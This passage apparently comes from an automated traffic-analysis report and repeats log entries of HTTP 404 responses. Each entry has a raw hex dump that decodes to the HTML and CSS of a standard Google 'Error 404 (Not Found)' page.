6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
